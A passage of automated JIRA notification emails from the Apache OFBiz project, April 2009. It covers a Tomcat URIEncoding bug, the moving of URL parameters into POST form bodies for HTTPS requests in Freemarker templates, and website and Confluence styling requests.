   org.ofbiz.service.ServiceDispatcher.runSync(ServiceDispatcher.java:297)
   org.ofbiz.service.ServiceDispatcher.runSync(ServiceDispatcher.java:208)
   org.ofbiz.service.GenericDispatcher.runSync(GenericDispatcher.java:149)
   org.ofbiz.service.job.GenericServiceJob.exec(GenericServiceJob.java:69)
   org.ofbiz.service.job.JobInvoker.run(JobInvoker.java:240)
   java.lang.Thread.run(Thread.java:595)

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-281) The URIEncoding parameter of the Tomcat connector does not seem to be taken into account

2009-04-20 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-281?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-281.
-

   Resolution: Won't Fix
Fix Version/s: SVN trunk
 Assignee: David E. Jones

As suggested in https://issues.apache.org/bugzilla/show_bug.cgi?id=23929, the 
best is to use POST

 The URIEncoding parameter of the Tomcat connector does not seem to be taken 
 into account
 

 Key: OFBIZ-281
 URL: https://issues.apache.org/jira/browse/OFBIZ-281
 Project: OFBiz
  Issue Type: Bug
  Components: framework
Affects Versions: SVN trunk
 Environment: Linux 2.6.x, firefox 1.5 
Reporter: Marco Risaliti
Assignee: David E. Jones
 Fix For: SVN trunk

 Attachments: URIEncoding-problem.patch, URIEncoding-quickfix.patch


 Copy of http://jira.undersunconsulting.com/browse/OFBIZ-861 from Peter Goron.
 ===
 When I create an entity value which contains UTF-8 characters in its primary 
 keys, I'm unable to access it via webtools entity data maintenance or its 
 corresponding management interface in backend. 
 For example, if you create a new Security Group from partymgr application 
 with theses parameters : 
 id = Securité 
 description = Test 
 Then you try to select the newly created Security Group from Security Group 
 List or you type this url : 
 https://127.0.0.1:8443/partymgr/control/EditSecurityGroup?groupId=securit%C3%A9
  
 you should obtain an Edit Security Group form with theses parameters : 
 id = securité -[CommonCannotBeFound: [securité]]- 
 description = 
 The symptoms are similar when you try to access to this entity via webtools 
 https://127.0.0.1:8443/webtools/control/ViewGeneric?entityName=SecurityGroupgroupId=securit%C3%A9
  
 - Specified SecurityGroup was not found. 
 The problem is not specific to SecurityGroup entity, it can be reproduced for 
 all entities. 
 After some search, it appears that request.getParameter(pkField) doesn't 
 decode 
 correctly the UTF-8 sequence %C3%A9 whereas URIEncoding of HTTP(S) 
 connector is 
 set to UTF-8. 
 The patch 'URIEncoding-problem.patch' try to demonstrate that the URIEncoding 
 specified in base/config/ofbiz-containers.xml (UTF-8) is not set at the 
 connector level. After having applied the patch, recompiled Ofbiz and 
 restarted it, the following lines should appear at the end of Ofbiz loading. 
 32017 (main) [ CatalinaContainer.java:238:INFO ] Connector AJP/1.3 @ 8009 - 
 not-secure URIEncoding=null [org.apache.jk.server.JkCoyoteHandler] started. 
 32018 (main) [ CatalinaContainer.java:235:INFO ] Connector HTTP/1.1 @ 8080 - 
 not-secure URIEncoding=null [org.apache.coyote.http11.Http11Protocol] 
 started. 
 32018 (main) [ CatalinaContainer.java:235:INFO ] Connector TLS @ 8443 - 
 secure URIEncoding=null [org.apache.coyote.http11.Http11Protocol] started. 
 32022 (main) [ CatalinaContainer.java:242:INFO ] Started Apache Tomcat/5.5.9 
 I've written a small workaround that use setURIEncoding instead of 
 setProperty 
 Connector's method. After having applied the patch 
 'URIEncoding-quickfix.patch', 
 recompiled Ofbiz and restarted it, you should see the following lines at the 
 end 
 of ofbiz loading. 
 20551 (main) [ CatalinaContainer.java:238:INFO ] Connector AJP/1.3 @ 8009 - 
 not-secure URIEncoding=UTF-8 [org.apache.jk.server.JkCoyoteHandler] started. 
 20552 (main) [ CatalinaContainer.java:235:INFO ] Connector HTTP/1.1 @ 8080 - 
 not-secure URIEncoding=UTF-8 [org.apache.coyote.http11.Http11Protocol] 
 started. 
 20552 (main) [ CatalinaContainer.java:235:INFO ] Connector TLS @ 8443 - 
 secure URIEncoding=UTF-8 [org.apache.coyote.http11.Http11Protocol] started. 
 20602 (main) [ CatalinaContainer.java:242:INFO ] Started Apache Tomcat/5.5.9 
 With this patch the problem disapear but I don't think it is the right 
 solution. 
 I think the behavior of the setProperty(String, String) method of Tomcat 
 Connector class has changed in 5.5.x series. When you look at its source code 
 : 
 (http://svn.apache.org/repos/asf/tomcat/container/tc5.5.x/catalina/src/share/org/apache/catalina/connector/Connector.java)
  
 it seems this method only set parameters of the protocol handler. And 
 URIEncoding is a parameter of the connector and not of the protocol handler. 
 This problem does not appear in the non-embedded version of tomcat because 
 they use 
 common-digester to map xml elements and attributes of configuration file to 
 setters 
 of Connector object. 
 Can someone confirm this problem ?
  
  
  AllCommentsWork LogChange History   Sort Order:   
 Comment by David E. Jones [24/Apr/06 12:16 AM] [ Permlink ] 
 This is actually a bigger issue than you might think. Even if the tomcat 
 setting 

[jira] Created: (OFBIZ-2323) Allow to smoothly change the logo

2009-04-20 Thread Jacques Le Roux (JIRA)
Allow to smoothly change the logo
-

 Key: OFBIZ-2323
 URL: https://issues.apache.org/jira/browse/OFBIZ-2323
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


For now you have to make the logo the same size as the original.  It's done at 
#logo in global.css

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2323) Allow to smoothly change the logo

2009-04-20 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2323.
--

Resolution: Won't Fix

Yes, I agree an issue is really something too big for that. My intention was to 
record it, but it's also true that this is not a need in most case (people will 
adjut the logo size I mean)

 Allow to smoothly change the logo
 -

 Key: OFBIZ-2323
 URL: https://issues.apache.org/jira/browse/OFBIZ-2323
 Project: OFBiz
  Issue Type: Sub-task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


 For now you have to make the logo the same size as the original.  It's done 
 at #logo in global.css

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2260) Secure URLs in Freemarker templates files

2009-04-20 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2260?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700894#action_12700894
 ] 

Jacques Le Roux commented on OFBIZ-2260:


I found this one in error.log on demo server 

2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
=== Found URL parameter [partyId] passed to secure (https) 
request-map with uri [searchorders] with an event that calls service 
[findOrders]; this is not allowed for security reasons! The data should be 
encrypted by making it part of the request body (a form field) instead of the 
request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
this can be changed using the service.http.parameters.require.encrypted 
property in the url.properties file

2 cases
a 
href=@ofbizUrl/searchorders?lookupFlag=Yamp;hideFields=Yamp;partyId=${partyId}amp;viewIndex=1amp;viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a

a 
href=/ordermgr/control/searchorders?lookupFlag=Yamp;hideFields=Yamp;partyId=${partyRow.partyId
 + 
externalKeyParam}amp;viewIndex=1amp;viewSize=20${uiLabelMap.OrderOrders}/a

I will see later, I continue to look at error.log, to see how much we can get 
from here...

 Secure URLs in Freemarker templates files
 -

 Key: OFBIZ-2260
 URL: https://issues.apache.org/jira/browse/OFBIZ-2260
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 4.0, Release Branch 9.04
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 4.0, Release Branch 9.04

 Attachments: EditCustomTimePeriod.ftl.patch, 
 EditProductFeatures.ftl.patch, listPortalPortlets.patch, OFBIZ-2256.patch, 
 OFBIZ-2260.patch, OFBIZ-2260.patch, orderitems.patch, UpdateLabelsFiles.patch


 Follow OFBIZ-2256 but for FTL files only

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2260) Secure URLs in Freemarker templates files

2009-04-20 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2260?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12700897#action_12700897
 ] 

Jacques Le Roux commented on OFBIZ-2260:


Another one in error.log

2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL.

but this one is another exception : (paramString contains orderId...)

form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl




 Secure URLs in Freemarker templates files
 -

 Key: OFBIZ-2260
 URL: https://issues.apache.org/jira/browse/OFBIZ-2260
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 4.0, Release Branch 9.04
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 4.0, Release Branch 9.04

 Attachments: EditCustomTimePeriod.ftl.patch, 
 EditProductFeatures.ftl.patch, listPortalPortlets.patch, OFBIZ-2256.patch, 
 OFBIZ-2260.patch, OFBIZ-2260.patch, orderitems.patch, UpdateLabelsFiles.patch


 Follow OFBIZ-2256 but for FTL files only

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2288) Update the image / content scroller on index.html

2009-04-21 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2288?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701096#action_12701096
 ] 

Jacques Le Roux commented on OFBIZ-2288:


Ryan, David,

I saw at [this 
comment|https://issues.apache.org/jira/browse/OFBIZ-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701047#action_12701047]
 that Ryan spoke about rev7969 and rev7970. Maybe there is a confusion with an 
HWM or even the old OFBiz repo ?

 Update the image / content scroller on index.html
 -

 Key: OFBIZ-2288
 URL: https://issues.apache.org/jira/browse/OFBIZ-2288
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Tim Ruppert
 Fix For: SVN trunk

 Attachments: Archive.zip, images.zip, index.patch, indexUpdate.patch, 
 ofbizSiteTemplate.zip


 Currently there is a JavaScript scroller on the index.html page, but it's not 
 clear to everyone that it is there.  Let's do this:
 1. Make it so that they scroll ever 10 seconds between what is there.
 2. Put a pause on it - which will stop the scrolling, but allow you to start 
 it up again.
 3. Make it so what comes up first is totally random
 4. Make it so it scrolls around to the beginning again instead of stopping at 
 the last one (in either direction)

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2260) Secure URLs in Freemarker templates files

2009-04-21 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2260?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701144#action_12701144
 ] 

Jacques Le Roux commented on OFBIZ-2260:


I finally commited EditProductFeatures.ftl.patch at revision: 767127  
I was only an issue with Firebug :(

I will (hopefully) fix the 3 others and will close as I said... This kind of 
issue where actually there are several issues always ends as a mess ! 
You can't have several issues in a solz issue. We should open a sub task for 
each even if it seems heavy at start, after it proves beneficial. 
Lesson learned...

 Secure URLs in Freemarker templates files
 -

 Key: OFBIZ-2260
 URL: https://issues.apache.org/jira/browse/OFBIZ-2260
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 4.0, Release Branch 9.04
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 4.0, Release Branch 9.04

 Attachments: EditCustomTimePeriod.ftl.patch, 
 EditProductFeatures.ftl.patch, listPortalPortlets.patch, OFBIZ-2256.patch, 
 OFBIZ-2260.patch, OFBIZ-2260.patch, orderitems.patch, UpdateLabelsFiles.patch


 Follow OFBIZ-2256 but for FTL files only

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2260) Secure URLs in Freemarker templates files

2009-04-21 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2260?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2260.
--

Resolution: Fixed

Closing and opening a main task with subtasks for each new case reported

 Secure URLs in Freemarker templates files
 -

 Key: OFBIZ-2260
 URL: https://issues.apache.org/jira/browse/OFBIZ-2260
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 4.0, Release Branch 9.04
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 4.0, Release Branch 9.04

 Attachments: EditCustomTimePeriod.ftl.patch, 
 EditProductFeatures.ftl.patch, listPortalPortlets.patch, OFBIZ-2256.patch, 
 OFBIZ-2260.patch, OFBIZ-2260.patch, orderitems.patch, UpdateLabelsFiles.patch


 Follow OFBIZ-2256 but for FTL files only

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2330) Main task for securing URLs in Freemarker templates files

2009-04-21 Thread Jacques Le Roux (JIRA)
Main task for securing URLs in Freemarker templates files
-

 Key: OFBIZ-2330
 URL: https://issues.apache.org/jira/browse/OFBIZ-2330
 Project: OFBiz
  Issue Type: Task
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
Assignee: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


The idea is to create a new subtask for each issue reported. 
This to avoid ending with a mess since a sole issue can be used for several 
issues.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2331) This is when, quich ship is used and later we attempt to change the shipment box type under the 'packages' tab.

2009-04-21 Thread Jacques Le Roux (JIRA)
This is when, quich ship is used and later we attempt to change the shipment 
box type under the 'packages' tab.
---

 Key: OFBIZ-2331
 URL: https://issues.apache.org/jira/browse/OFBIZ-2331
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


https://www.example.com/facility/control/updateShipmentPackage?shipmentId=10012shipmentPackageSeqId=1weight=weightUomId=shipmentBoxTypeId=FXENVinsuredValue=

This is when, quich ship is used and later we attempt to change the shipment 
box type under the 'packages' tab.

Rohit

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2332) I found this one in error.log on demo server

2009-04-21 Thread Jacques Le Roux (JIRA)
I found this one in error.log on demo server


 Key: OFBIZ-2332
 URL: https://issues.apache.org/jira/browse/OFBIZ-2332
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


I found this one in error.log on demo server

2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
=== Found URL parameter [partyId] passed to secure (https) 
request-map with uri [searchorders] with an event that calls service 
[findOrders]; this is not allowed for security reasons! The data should be 
encrypted by making it part of the request body (a form field) instead of the 
request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
this can be changed using the service.http.parameters.require.encrypted 
property in the url.properties file

2 cases
a 
href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a

a 
href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
 + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a

I will see later, I continue to look at error.log, to see how much we can get 
from here...
[ Afficher » ]
Jacques Le Roux added a comment - 20/avr./09 12:09 PM I found this one in 
error.log on demo server 2009-04-19 16:10:30,520 (TP-Processor17) 
[ServiceEventHandler.java:399:ERROR] === Found URL parameter 
[partyId] passed to secure (https) request-map with uri [searchorders] with an 
event that calls service [findOrders]; this is not allowed for security 
reasons! The data should be encrypted by making it part of the request body (a 
form field) instead of the request URL.; In session 
[DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that this can be changed using 
the service.http.parameters.require.encrypted property in the url.properties 
file 2 cases a 
href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a a 
href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
 + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a I 
will see later, I continue to look at error.log, to see how much we can get 
from here...


-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2333) Another one in error.log

2009-04-21 Thread Jacques Le Roux (JIRA)
Another one in error.log  
--

 Key: OFBIZ-2333
 URL: https://issues.apache.org/jira/browse/OFBIZ-2333
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


Another one in error.log

2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL.

but this one is another exception : (paramString contains orderId...)

form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl
[ Afficher » ]
Jacques Le Roux added a comment - 20/avr./09 12:19 PM Another one in error.log 
2009-04-19 13:49:51,262 (TP-Processor17) [ RequestHandler.java:399:ERROR] 
Request createOrderAdjustment caused an error with the following message: Error 
calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL 
parameter [orderId] passed to secure (https) request-map with uri 
[createOrderAdjustment] with an event that calls service 
[createOrderAdjustment]; this is not allowed for security reasons! The data 
should be encrypted by making it part of the request body (a form field) 
instead of the request URL. but this one is another exception : (paramString 
contains orderId...) form name=addAdjustmentForm method=post 
action=@ofbizUrlcreateOrderAdjustment?${paramString}/@ofbizUrl


-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2332) I found this one in error.log on demo server

2009-04-21 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2332?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701179#action_12701179
 ] 

Jacques Le Roux commented on OFBIZ-2332:


Mmm, findOrders.ftl is not easy to transform.

Actually there are not 2 cases but 5. This would not be a problem if moreover 
there was not
* use of ${paramList} (a string containing all informations, ie search params 
names and values)
* a javascript lookupOrders() function related to searchorders calls

In a 1st pass I will reduce the complexity. If someone has a better idea please 
chime in... Maybe we should rewrite all...

 I found this one in error.log on demo server
 

 Key: OFBIZ-2332
 URL: https://issues.apache.org/jira/browse/OFBIZ-2332
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 I found this one in error.log on demo server
 2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
 === Found URL parameter [partyId] passed to secure (https) 
 request-map with uri [searchorders] with an event that calls service 
 [findOrders]; this is not allowed for security reasons! The data should be 
 encrypted by making it part of the request body (a form field) instead of the 
 request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
 this can be changed using the service.http.parameters.require.encrypted 
 property in the url.properties file
 2 cases
 a 
 href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
  class=buttontext${uiLabelMap.OrderOtherOrders}/a
 a 
 href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
  + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a
 I will see later, I continue to look at error.log, to see how much we can get 
 from here...
 [ Afficher » ]
 Jacques Le Roux added a comment - 20/avr./09 12:09 PM I found this one in 
 error.log on demo server 2009-04-19 16:10:30,520 (TP-Processor17) 
 [ServiceEventHandler.java:399:ERROR] === Found URL parameter 
 [partyId] passed to secure (https) request-map with uri [searchorders] with 
 an event that calls service [findOrders]; this is not allowed for security 
 reasons! The data should be encrypted by making it part of the request body 
 (a form field) instead of the request URL.; In session 
 [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that this can be changed using 
 the service.http.parameters.require.encrypted property in the url.properties 
 file 2 cases a 
 href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
  class=buttontext${uiLabelMap.OrderOtherOrders}/a a 
 href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
  + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a I 
 will see later, I continue to look at error.log, to see how much we can get 
 from here...

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2331) This is when, quich ship is used and later we attempt to change the shipment box type under the 'packages' tab.

2009-04-21 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2331?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701265#action_12701265
 ] 

Jacques Le Roux commented on OFBIZ-2331:


Hi Rohit,

I found a sole occurence of updateShipmentPackage and it was already using a 
form with hidden parameters but the method was not specified (and GET is the 
default). I commited a fix at r767287, could you check if it fixes your problem 
?

Thanks

 This is when, quich ship is used and later we attempt to change the shipment 
 box type under the 'packages' tab.
 ---

 Key: OFBIZ-2331
 URL: https://issues.apache.org/jira/browse/OFBIZ-2331
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 https://www.example.com/facility/control/updateShipmentPackage?shipmentId=10012shipmentPackageSeqId=1weight=weightUomId=shipmentBoxTypeId=FXENVinsuredValue=
 This is when, quich ship is used and later we attempt to change the shipment 
 box type under the 'packages' tab.
 Rohit

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701448#action_12701448
 ] 

Jacques Le Roux commented on OFBIZ-2298:


The table issue is resolved

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-22 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2298.
--

Resolution: Fixed
  Assignee: Tim Ruppert

Closing : I opened a Main task with sub-tasks at OFBIZ-2338 instead

 Issue with the new smoothfeather look in OFBiz documentation (Confluence)
 -

 Key: OFBIZ-2298
 URL: https://issues.apache.org/jira/browse/OFBIZ-2298
 Project: OFBiz
  Issue Type: Improvement
 Environment: NA
Reporter: Jacques Le Roux
Assignee: Tim Ruppert

 The styles associate with
 *
 and
 **
 are not rendering bullets now. Could it be possible to differentiate simple 
 indentation with bullet (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2340) {code}, {quote}, {warning} should be centered and stretchable

2009-04-22 Thread Jacques Le Roux (JIRA)
{code}, {quote}, {warning} should be centered and stretchable
---

 Key: OFBIZ-2340
 URL: https://issues.apache.org/jira/browse/OFBIZ-2340
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


Could we have the Confluence style for {code}, {quote}, {warning}, etc centered 
(as it's in Confluence by default) ?

And could these blocks be stretchable,  (as it's in Confluence by default) ? 
For instance see http://docs.ofbiz.org/display/OFBIZ/Visual+Themes+-+How+to


-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2335) Let's left align that footer text again on ofbiz.apache.org (and other sites)

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2335?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701476#action_12701476
 ] 

Jacques Le Roux commented on OFBIZ-2335:


Finally why not, I like this kind of tings centered but it's really subjective 
;) 
If it's easier I agree we should go for it

 Let's left align that footer text again on ofbiz.apache.org (and other sites)
 -

 Key: OFBIZ-2335
 URL: https://issues.apache.org/jira/browse/OFBIZ-2335
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Tim Ruppert
Priority: Minor
 Fix For: SVN trunk


 After letting it sit for over a week and trying to get used to it - I have to 
 say that I really don't like the centered text and here's the reason why ... 
 because it's still not centered !  There is nothing to anchor it to and in 
 fact since nothing else is centered like that - I'm going to have to request 
 that we look at this again.
 I'd be happy to get log, build and docs updated - and here's the patch for 
 putting the footer back as soon as we can.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2334) Move feature list on homepage to a more prominent location

2009-04-22 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2334?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12701478#action_12701478
 ] 

Jacques Le Roux commented on OFBIZ-2334:


Great last enhancements, thanks guys!

 Move feature list on homepage to a more prominent location
 --

 Key: OFBIZ-2334
 URL: https://issues.apache.org/jira/browse/OFBIZ-2334
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Ryan Foster
Assignee: Tim Ruppert
Priority: Minor
 Fix For: SVN trunk

 Attachments: featureHighlights.png, highlight-bullet.gif, 
 highlightUpdate.patch, indexWithHighlights.patch


 While putting together the style guide, I moved the feature list that sites 
 at the bottom of the What is Apache OFBiz? section to be a highlight 
 inside of the section in order to make it stand out more.  I'll attach a 
 patch and a picture so you can see the effect.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2339) No bullets rendered

2009-04-22 Thread Jacques Le Roux (JIRA)
No bullets rendered
---

 Key: OFBIZ-2339
 URL: https://issues.apache.org/jira/browse/OFBIZ-2339
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux


The styles associate with
*
and
**
are no longer rendering bullets.

Could it be possible to differentiate simple indentation from bullet (numbering 
is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Created: (OFBIZ-2338) Main task for issues with the new smoothfeather look in OFBiz documentation (Confluence)

2009-04-22 Thread Jacques Le Roux (JIRA)
Main task for issues with the new smoothfeather look in OFBiz documentation 
(Confluence)


 Key: OFBIZ-2338
 URL: https://issues.apache.org/jira/browse/OFBIZ-2338
 Project: OFBiz
  Issue Type: Task
Reporter: Jacques Le Roux


The idea is to create a new subtask for each issue reported. This to avoid 
ending with a mess since a sole issue should not be used for several issues.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2340) {code}, {quote}, {warning} should be centered and stretchable

2009-04-22 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2340?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2340:
---

Description: 
Could we have the Confluence style for \{code}, \{quote}, \{warning}, etc 
centered (as it's in Confluence by default) ?

And could these blocks be stretchable,  (as it's in Confluence by default) ? 
For instance see http://docs.ofbiz.org/display/OFBIZ/Visual+Themes+-+How+to


  was:
Could we have the Confluence style for {code}, {quote}, {warning}, etc centered 
(as it's in Confluence by default) ?

And could these blocks be stretchable,  (as it's in Confluence by default) ? 
For instance see http://docs.ofbiz.org/display/OFBIZ/Visual+Themes+-+How+to



 {code}, {quote}, {warning} should be centered and stretchable
 ---

 Key: OFBIZ-2340
 URL: https://issues.apache.org/jira/browse/OFBIZ-2340
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 Could we have the Confluence style for \{code}, \{quote}, \{warning}, etc 
 centered (as it's in Confluence by default) ?
